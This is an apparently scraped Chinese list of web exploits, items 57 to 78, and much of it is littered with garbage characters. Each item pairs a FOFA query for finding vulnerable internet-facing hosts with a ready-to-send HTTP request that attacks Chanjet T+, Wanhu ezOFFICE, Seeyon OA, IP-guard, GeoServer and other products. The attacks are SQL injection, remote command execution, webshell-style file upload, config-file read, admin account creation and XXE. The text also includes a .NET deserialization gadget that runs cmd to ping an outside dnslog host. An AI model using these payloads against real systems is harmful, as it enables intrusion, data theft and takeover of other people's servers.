( p) Z+ b; T3 y( R' b{1 t- o6 e7 q4 s) w6 s" w" |
"storeID":{
X4 k8 j1 `8 g( G }( I, i2 U "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
1 d) L9 U- H; f& S "MethodName":"Start",+ U1 p! o+ Q. o8 c
"ObjectInstance":{( l- M# C: }" {( G6 A0 L7 z
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",% c3 P% R1 {( n( p' D8 R0 y- K% \! V0 n
"StartInfo": {
: o: [5 W3 a# `5 ~& A( ] "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",. C0 h5 j) ` H, r) N; u( g. d4 t1 c
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"5 e$ _6 I$ d, H3 h7 {/ X
}
, L, K. ^; @! I% t7 I8 c }
5 W/ |& f$ A! @* j% @! I }4 T4 |. c, k! p! M' P& b
}" ?" f& Z. m* M+ D- \! c
& h; f/ [ s/ x& d3 l2 G: L
. |1 F: W* z7 D, n2 O57. 畅捷通T+ keyEdit.aspx SQL注入6 A% o) a2 k" X' y7 @( ^
FOFA:app="畅捷通-TPlus"* f. G; V! s, y- Q8 Q4 m9 L
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
' r9 i. Y& ]6 b' n" q# gHost: host2 l8 i. I& B& s2 B
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
9 B, D7 |1 W2 KAccept-Charset: utf-8
6 j, m% N* Z: w# h8 CAccept-Encoding: gzip, deflate) X+ F6 e3 |' i% l: E
Connection: close
0 F' l! A' b8 h1 u8 D5 E, L3 s1 K! _3 ?7 [
/ \3 p9 u4 c% l7 y, F
58. 畅捷通T+ KeyInfoList.aspx sql注入
/ y0 r: j* e$ @FOFA:app="畅捷通-TPlus"
2 i. }9 K% F0 rGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1 [: J9 q/ l3 L' `7 Z) g( B" s1 |
Host: your-ip
4 {0 f5 @' K5 o) pUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
( o9 B+ |7 C! h. z& ?Accept-Charset: utf-8
* J; S9 v3 h7 Y# A3 e' R4 p/ K& xAccept-Encoding: gzip, deflate
+ k; n- C: E6 _# [( X5 J$ k- k2 yConnection: close& q4 y3 y9 X- C
! r* y9 N/ T5 m0 ?8 S" g% w* `# T) q: f
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行5 ]9 a4 i3 A6 F% _0 c: v
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"1 ~, c, [$ d$ \! Q0 k
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1& u* \# |$ `6 _$ k
Host: 192.168.86.128:90902 `: f1 S+ J: O) @: ?2 l" S0 g
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36! h# a, T$ j" n) l" P
Connection: close
5 p$ a2 {1 C' q- f0 s) d* }, S* L7 y$ wContent-Length: 1669
1 _/ P$ Z/ g, {/ q* \$ hAccept: */*1 |5 F% t7 H [
Accept-Language: en
& L) p% h9 F' J5 c" J; GContent-Type: application/x-www-form-urlencoded! ~: v" O, X3 p
Accept-Encoding: gzip G% t* r) I! Y8 t1 O; n
8 l0 P( t$ t. J' B! D d' ^8 mPAYLOAD$ Y9 ]: T9 q$ `5 k8 d
4 G& J. v& T( }& t- R, ?
/ m; M7 J5 S0 ^4 Z% h0 ^1 W
60. 百卓Smart管理平台 importexport.php SQL注入
. f s T/ i; Y6 m. C4 v7 {FOFA:title="Smart管理平台"
9 H0 U1 \5 E8 I" G1 wGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
: M* T# [. L2 X) A& T, B& UHost:+ t( r( |* S% @) P [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36. g& i2 \* e5 z$ \( c) g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 R- h- S+ O, }+ y( v% [/ JAccept-Encoding: gzip, deflate6 a6 R/ j3 O8 j& ~8 q! H3 N
Accept-Language: zh-CN,zh;q=0.9
' G8 j: [$ E* n. eConnection: close# ?. A( k1 ^4 k
3 d" u$ R$ m' h; Y" H$ }8 j+ y6 x3 y+ I* w9 X' D& }
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传0 ?% g) e0 Y4 _+ z, x" p
FOFA: title="欢迎使用浙大恩特客户资源管理系统"5 Z6 F3 |% v5 V" B: a* W W1 L! E
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1- i/ |4 f$ Y- w: w4 n
Host: x.x.x.x
2 N' l6 j: ]2 I& O# l2 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" k) q/ o4 P) J+ j0 Y3 M4 O
Connection: close
- O$ s. E$ B h2 `8 Q& pContent-Length: 27
) _6 V0 J) K- c* g5 ^) @9 ^Accept: */*
% e$ o- G& Q' y$ OAccept-Encoding: gzip, deflate8 _' C3 y; r. T/ r3 J" K1 j8 f
Accept-Language: en
4 ^; l+ [' ]7 o! c7 zContent-Type: application/x-www-form-urlencoded5 [: `7 f9 ?9 y+ q# E0 K
; H2 h! M) i8 y% C
8uxssX66eqrqtKObcVa0kid98xa- m8 ` e9 @1 L6 X: h5 i
' O! ?) Q% s& x7 @$ v7 B3 _
( q/ i4 _2 I/ L# [
62. IP-guard WebServer 远程命令执行
# A# \6 \$ L! m8 M; T5 f7 DFOFA:"IP-guard" && icon_hash="2030860561"$ Q2 j4 ~! |/ y, Q; k# G
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
1 ^* X! j! u h6 l% k" ~( {Host: x.x.x.x' P2 Q8 S: e* M
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36% f+ Y9 y4 P+ c
Connection: close
9 n/ o: I( {1 R. i8 _; Z2 DAccept: */*
9 L# g/ y5 k) LAccept-Language: en1 K# \* U: A+ J, o8 u
Accept-Encoding: gzip; u+ ^) Y- I2 G9 g: p) |
4 I0 X8 C, Q+ D( z4 d) L: n
$ _7 }0 j( }- _; u5 V [6 ^访问& d% v: h2 M6 C- q. p, E
; l" e8 k" ^- J T: t6 s' EGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
5 K' X+ a; T. Z0 s) X% [, U Z, rHost: x.x.x.x
" K& ?; V8 } s' r" {% J9 q' h2 J: ^
6 N R4 _7 q& ~! \% L& ]& C: F5 F$ J) Q- ]' l
63. IP-guard WebServer任意文件读取9 _. }, }, J: j; ]
IP-guard < 4.82.0609.05 v1 Q* \0 w6 V" A! x) P/ b9 k* O
FOFA:icon_hash="2030860561"8 N% w6 ~: U0 ~2 i7 I
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.12 g! M8 `, V0 ~+ z+ z: f" B
Host: your-ip. ?8 G D E" ^1 E {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36' K! Q7 K% j: i6 w, J% _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 K; _- a4 a0 O
Accept-Encoding: gzip, deflate% p& H3 \: q" e5 v6 T+ N" \/ u
Accept-Language: zh-CN,zh;q=0.94 i# C Q- @' O- q+ q$ P. V
Connection: close
% Y1 N* c' S* x; ]) \: W3 t' lContent-Type: application/x-www-form-urlencoded* h3 d8 M7 W/ ?0 b p) i `. F
- S9 p1 E" Q3 f3 G6 E
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
/ l+ K$ I7 O* H& j, w3 V3 N& | m( G9 p$ }/ d( G( m
64. 捷诚管理信息系统CWSFinanceCommon SQL注入! ~$ U$ g- z6 t, w
FOFA:body="/Scripts/EnjoyMsg.js"
0 e: y# P9 j" A) }POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
; O( V% b# o( H( q lHost: 192.168.86.128:9001
' M. V7 q' J) R" X xUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
: H" V! l" z, O3 q) MConnection: close. p, ~% a4 I8 C% s+ n4 A
Content-Length: 369: q6 I) t r) [2 g
Accept: */*; T( w2 d/ ?# |: z7 @4 Z: Y \2 {
Accept-Language: en
! j7 r+ W4 l8 V' C3 |2 E$ N! |Content-Type: text/xml; charset=utf-87 X: Y/ u6 S: L: g; g6 f8 t
Accept-Encoding: gzip5 y+ r9 `7 c/ A% i; @
; u! S9 _, [6 h: h' v8 `
<?xml version="1.0" encoding="utf-8"?>
' k e% b8 N* @. ]: \/ P A<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
7 R" a- j# B2 @6 |2 h, W8 _& j# _<soap:Body>! \5 E& i( Z" ]0 m5 h% m6 f
<GetOSpById xmlns="http://tempuri.org/">) B) v- H1 X9 I! g& @( g
<sId>1';waitfor delay '0:0:5'--+</sId>+ k0 [' H2 f( h5 d
</GetOSpById>
$ d% a1 r9 _" P; ? </soap:Body>3 e& [" ^ Y2 p2 z& A' k
</soap:Envelope>" O& \7 P! V* v) b' [8 F
+ K0 B( k5 j& b) s) D. _9 I; B! ~5 \+ J. T \! T2 \6 E
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过; k" R) F+ u6 R! P9 s% m
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
; p0 f5 g$ d2 o: O/ p p响应200即成功创建账号test123456/1234565 d E F8 X6 E/ ~# r) q& J* J
POST /SystemMng.ashx HTTP/1.1
7 S$ q( j1 M' aHost:
0 }" S. e! _5 w1 T! t4 q% x; OUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
: x9 @/ m; r: e4 lAccept-Encoding: gzip, deflate
* o2 y \; T4 ^% h% u: LAccept: */*! ^. I9 l' p! F1 L( x/ s
Connection: close
, l( k3 F8 B% T$ F. P- j/ F1 z! GAccept-Language: en( D; t. s; J5 i$ E, n2 m) P
Content-Length: 174
+ G1 z" L4 d3 M( s2 A' m3 {
5 p6 u9 d- ?" j' z5 c( T# W) h( P8 joperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators, M6 P3 e# v3 X" d, D
% B9 k, H1 w" H" H$ W: ^+ N; s# O1 j0 L# {! s* l* _- p6 ~- Z+ l
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
4 S* P6 _4 o% S) gFOFA:app="万户ezOFFICE协同管理平台", M' ]& u. {4 |0 J
9 ^% O% S( j) L
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.14 O5 H% m9 b( f" j; u# E4 e
Host: x.x.x.x% Z ?% ?& ]! m* E; ?! W% f) j
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.368 |, T# |9 t" N0 s. ?6 k& a
Connection: close) k1 ?4 x P$ g) C7 T1 f$ C. B% Z
Accept: */*. D! A7 |, x3 L5 g8 ]- H4 Q) s
Accept-Language: en
! W' H- J2 B2 k, LAccept-Encoding: gzip' c! v: r0 M" K! a9 g
; }9 h/ N0 E A# O6 C( C e
. V, S+ s, n; o! ?4 N% J. C第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在7 T, n3 o6 B0 y* @
! [- w% O" G/ C9 ^, u2 S5 p* M( P0 j67. 万户ezOFFICE wpsservlet任意文件上传- w0 U. c. v( @3 W
FOFA:app="万户网络-ezOFFICE"( H" v3 @+ `3 H
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型" I9 W7 E: Q* F) w1 g& B8 Q
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1& _3 z: N8 ^, i3 t5 |2 f; [$ w
Host: x.x.x.x7 J$ g: [8 @& K
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
! E9 F7 T2 e8 s i3 S+ G4 H5 @Content-Length: 173& w( i) k" ?1 ?6 z; W) P1 z6 `9 H6 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.87 t. O, _4 O0 L2 W! g, \& o
Accept-Encoding: gzip, deflate
7 U: H2 R2 [, t3 V( d9 KAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
l# d- Z p0 ?* i4 zConnection: close" m" Z6 w8 n, A& d
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
0 K6 s" {* Z! e/ u! K9 C- q6 aDNT: 1
' u7 B5 @/ s3 S8 k* L9 a+ dUpgrade-Insecure-Requests: 1
c/ K( r4 S* F# P
3 a/ `4 g& [* A; C+ A: B, G--ufuadpxathqvxfqnuyuqaozvseiueerp' T/ J4 n7 w1 M
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
6 d4 j# O6 Q; N7 f7 n$ Y0 T+ C
7 o; }0 z9 y& j8 l. y) L. k<% out.print("sasdfghjkj");%>- D. [! t0 K* `: _% K. Y5 b3 s
--ufuadpxathqvxfqnuyuqaozvseiueerp--/ `* i; @3 Q$ Q( x) o: U
: h) z( M' c) o; h9 Q* j
- g, I8 n' J; x4 F' S7 s3 H4 [
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
' C& }3 M% p k, s2 a& ~! s
$ F" F. U/ D6 k. L68. 万户ezOFFICE wf_printnum.jsp SQL注入
7 Q0 K+ i3 n7 k, S$ ]5 GFOFA:app="万户ezOFFICE协同管理平台"
) Y! H% X, G8 D0 cGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
. k! t0 a: @ l8 U9 p6 b: H& FHost: {{host}}
5 H3 q8 ]0 ?8 l8 ~) cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
. P9 V, l) q5 {0 F/ tAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8* q+ i0 e; w$ c3 B
Accept-Encoding: gzip, deflate! r) E2 L5 U* [
Accept-Language: zh-CN,zh;q=0.9
2 d5 ]; E/ |) j; w5 Y% M: {, d0 @' xConnection: close
' m4 F' R+ Y7 r( c, A9 H4 @* Y
4 M+ K' N- f$ O# p6 a, w* O+ Q4 t/ N2 `/ C- k& d% m
69. 万户 ezOFFICE contract_gd.jsp SQL注入
6 X5 q: _3 Q$ SFOFA:app="万户ezOFFICE协同管理平台"
3 j* B6 n8 b, g6 m' wGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
% w! S2 o. p2 R4 [+ aHost: your-ip k, x0 y6 e9 i" B
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36% z- E9 U) T; q. M( R
Accept-Encoding: gzip, deflate
) z& p4 j" r' ^* E/ Z5 D' BAccept: */*& e1 T' J1 ? {( `! C. @% n
Connection: keep-alive' y8 a3 D+ F3 B$ f% m: z* j8 {
; i6 F0 Z. Q9 }9 Q7 s( k5 m
; X& R4 H. b0 K* {4 O5 f70. 万户ezEIP success 命令执行1 y+ M7 A( B! n! J
FOFA:app="万户网络-ezEIP"
0 M' ?9 R% [( Z! ?2 ^" VPOST /member/success.aspx HTTP/1.1* B7 x8 K7 q" w7 P6 y
Host: {{Hostname}}0 J: |8 D/ ^% i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+ E3 u) d2 b m/ R0 i" Z& z9 X4 ?SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=0 Z4 n# }! V6 r3 S
Content-Type: application/x-www-form-urlencoded
, O- Y% J! O) ]4 E/ ]6 h5 F3 ~TYPE: C: b$ `; L7 R- ?6 b5 l# ~
Content-Length: 16702
# H2 R) X% J( A6 K/ H1 Q, R
8 ~$ q2 f* q8 Y7 O__VIEWSTATE=PAYLOAD- B X8 j; X: k: W: W- |6 {6 F1 j* T
- G* u6 C! X( L+ X) V+ d& F
( s5 }/ X8 q( G$ y/ c0 l8 d/ i6 Q71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
0 L1 V! c; K( N$ R9 R& H. eFOFA:body="PM2项目管理系统BS版增强工具.zip"
0 r" D9 B9 ^2 n6 O& sGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1( d+ j% w$ f/ x, t
Host: x.x.x.xx.x.x.x, F' M! s- F. v% }/ ^8 ~9 _
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
% P. R6 I. N0 V2 DConnection: close
9 W) O! {6 G2 m; ^1 M/ EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) D: o1 d6 {/ w% g
Accept-Encoding: gzip, deflate) {6 F% Z3 \: L/ p- p: `* @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 P- z( y$ K# Y7 m
Upgrade-Insecure-Requests: 16 F/ C# R# j: M* P0 y
2 {+ M0 X1 B8 X! U2 T6 N L
3 j( H8 X: A" y7 r W# l; Z/ Z72. 致远OA getAjaxDataServlet XXE
* R* u9 X! a3 H5 y$ \FOFA:app="致远互联-OA"5 _1 F- T* J! k; [+ T. C
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
/ }) J* f$ v0 SHost: 192.168.40.131:8099! v8 |% y _. u4 b& f
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
1 _" A) Z! y* X. uConnection: close: X8 e* G5 D: j& t2 W: z
Content-Length: 5838 n1 U/ F' ?' H& Z0 {2 T
Content-Type: application/x-www-form-urlencoded
' I- X2 [8 Z+ _$ I8 k! C: IAccept-Encoding: gzip: w$ ?3 E, {- \% q2 L8 y) i- b u9 U
B3 o1 n4 D6 v0 O s8 L
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
6 I3 m k9 i" D# X# W0 K& D" J/ Y2 Z2 z9 u) r
3 t" X1 e0 C" c$ E( }9 E; l, u
73. GeoServer wms远程代码执行! n3 Y/ D* l4 E) `
FOFA:icon_hash=”97540678”/ c# a, W2 Q, E' \; o
POST /geoserver/wms HTTP/1.1! s" Q7 j- c: m, i
Host:
8 d1 r: A! n2 i. P) N' `6 U; cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
3 h w! u& o: G( _, DContent-Length: 1981. J1 G* S: ]5 K7 u
Accept-Encoding: gzip, deflate8 q% a7 W; l& t+ \) i
Connection: close; y- V! K- U. L6 o
Content-Type: application/xml
6 ?1 L) ^8 A* K ?; j) F& W1 a1 JSL-CE-SUID: 3
. ]6 ~8 }! C, T4 x+ b/ x$ J0 K: `5 }6 o4 B2 j+ u
PAYLOAD
# J ~/ m$ c* P$ C5 T3 ^& X0 I! d9 p6 u6 |
5 D7 F0 }8 b) c3 P2 Y0 d( ^3 N
74. 致远M3-server 6_1sp1 反序列化RCE5 z- v) j9 l2 {- P! o9 I0 m
FOFA:title="M3-Server"% j; O$ f5 v2 ~1 c, o+ [# F# h
PAYLOAD% Q& R$ Z" t0 j0 z8 J
0 v: @+ J, Z- S0 U! o7 w8 N75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE9 G4 G4 U/ t- [4 f8 _, f! p; M0 D' a
FOFA:app="TELESQUARE-TLR-2005KSH"
) {6 s; J* {% B7 Z- eGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.10 J$ J3 `; p& l3 ^+ c
Host: x.x.x.x
/ B7 I* Q6 T- _7 o4 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ F v! ?( [% S- f+ v G( f& r
Connection: close/ D) M5 H; y: q& Z1 S8 ]/ S4 @
Accept: */*
, e& i) {1 T' u. N) _! X1 ^Accept-Language: en
' r0 r0 m4 D8 X4 D$ eAccept-Encoding: gzip# Y6 p3 `2 B9 i$ v" d6 x
" ~* q/ o9 T+ ]/ A% P, H i) { w$ M/ B& E
GET /cgi-bin/test28256.txt HTTP/1.1
0 G- Y5 m$ I- c9 wHost: x.x.x.x
# S8 m2 U7 f. E3 d& G% s
6 y. S, c& J1 c ~% @4 ~0 ^ h
! q5 Z: W; [. [- S& P76. 新开普掌上校园服务管理平台service.action远程命令执行% w* Q* L; I- l8 e
FOFA:title="掌上校园服务管理平台"* C- V6 E2 K x& ~) c$ {% z
POST /service_transport/service.action HTTP/1.1
3 s z8 h+ V% U" eHost: x.x.x.x
& g! F8 g9 L% R( E" kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
# c' ~/ @7 z K8 S$ U7 nConnection: close% k" k8 ], k" x/ z
Content-Length: 211
! W" p* ?6 c% h; O y2 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 v2 P7 n$ e/ G, E- w# C6 UAccept-Encoding: gzip, deflate
* f! K& h' s, E3 F9 U0 G5 FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 C r+ F0 f6 F
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4& K4 Y0 Y! X6 n: Y( E
Upgrade-Insecure-Requests: 1+ C4 }8 |4 z- m, E, X
8 d8 s" S. I( Z6 o! R{" M* J* U/ F# a P7 K$ i5 r: n
"command": "GetFZinfo",
) S! v$ `/ ~3 k5 d0 s "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
; }, ~ Q4 [6 ?2 C4 b& I0 } ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"9 _. U8 U ~3 A; I
} V; l7 f3 }. Q& X
" z8 @5 k8 U' M* |! m! S5 G
9 J4 l$ h' R& E* ?GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
$ @) t7 q3 ~6 h1 N" v% [( e$ pHost: x.x.x.x3 }# y3 y6 M# J
7 w: w$ z- f2 U% m: h" k
3 ~0 |) C* W T6 T
5 J; S- b3 n# D1 p$ u% s77. F22服装管理软件系统UploadHandler.ashx任意文件上传
3 D) c0 b; M' o7 o& u/ MFOFA:body="F22WEB登陆"7 m- G$ _! a; Q% _2 O0 y0 }; G
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1; j' q2 I9 i* Q' y% G( S1 }
Host: x.x.x.x
9 h8 [) q1 m: q8 ~; `3 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.362 n7 h" A( Z. }6 e& i
Connection: close
2 z. a1 [5 h$ Z7 P% u9 I, PContent-Length: 433
& v/ y+ i5 F0 }+ n8 H" dAccept: */*8 P& ^! s, n, t$ j/ |
Accept-Encoding: gzip, deflate# }; q- H3 J9 t4 y# d% j- \% P
Accept-Language: zh-CN,zh;q=0.9. }+ `9 e7 k2 ?
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix5 B$ N' J% R# ^4 W5 ~) L
0 G# `" @7 g9 b0 c: S------------398jnjVTTlDVXHlE7yYnfwBoix/ }" Y; m/ @) X5 m/ e; c7 z) B) c' w4 ~
Content-Disposition: form-data; name="folder"6 |, K+ U' p* c2 c( Q# U
2 |' p; g% |: E5 D Q/upload/udplog
3 Q1 |; S# |4 a------------398jnjVTTlDVXHlE7yYnfwBoix; s7 g3 r' [3 a7 e* H+ U
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"2 `4 R; Y& s4 W! {/ z/ s
Content-Type: application/octet-stream' k7 B: ^" y! }' S. X
$ \" u% {! h* r1 H/ Y
hello1234567
3 l% x: w4 ? t2 D1 L! V------------398jnjVTTlDVXHlE7yYnfwBoix1 I1 q8 b+ r r7 q$ b7 z, }; [
Content-Disposition: form-data; name="Upload"! M' c) I, k$ j2 ]+ f; Y9 |& Q
% v3 K$ V0 [, v2 F/ j
Submit Query8 \" B/ b l1 }# [' j
------------398jnjVTTlDVXHlE7yYnfwBoix--. T. M P5 t* X0 U4 b
7 {( n- t7 @* C+ A- ` Y) u
9 J/ b/ r- t7 J8 p; p( M+ |78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传5 t4 E, k- _! ]: ?, a6 \. y* P
FOFA:icon_hash="2001627082"' h$ I' u: ]5 K! }- P
POST /Platform/System/FileUpload.ashx HTTP/1.1
% m6 b! ~' h7 w1 D7 I. P3 K. SHost: x.x.x.x `% z- w. M+ p4 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 ]) R/ ?, M2 x/ u ~9 i# CConnection: close
3 V2 q5 j# o5 x/ n( oContent-Length: 336
7 D( d: K& T; C6 b/ I fAccept-Encoding: gzip7 q" [6 }2 L7 V- O' h
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
: N* Q% d$ I3 d2 C2 F2 o R
6 o- b2 a d* y0 T- z1 Z. ~, k9 [. ~------YsOxWxSvj1KyZow1PTsh98fdu6l
# L0 M! J9 R# fContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"% T7 [3 T) I- X- y$ Y
Content-Type: image/png5 x) `. ~9 d7 C6 H1 c2 T" K+ O
+ W. h4 Q( ~9 O/ gYsOxWxSvj1KyZow1PTsh98fdu6l0 n7 y) s0 r- K7 A/ N
------YsOxWxSvj1KyZow1PTsh98fdu6l
) V6 v& [5 C. ?7 }Content-Disposition: form-data; name="target"0 c5 p0 Z% a$ V: P
% \9 S& D" ?3 C0 B) F/Applications/SkillDevelopAndEHS/
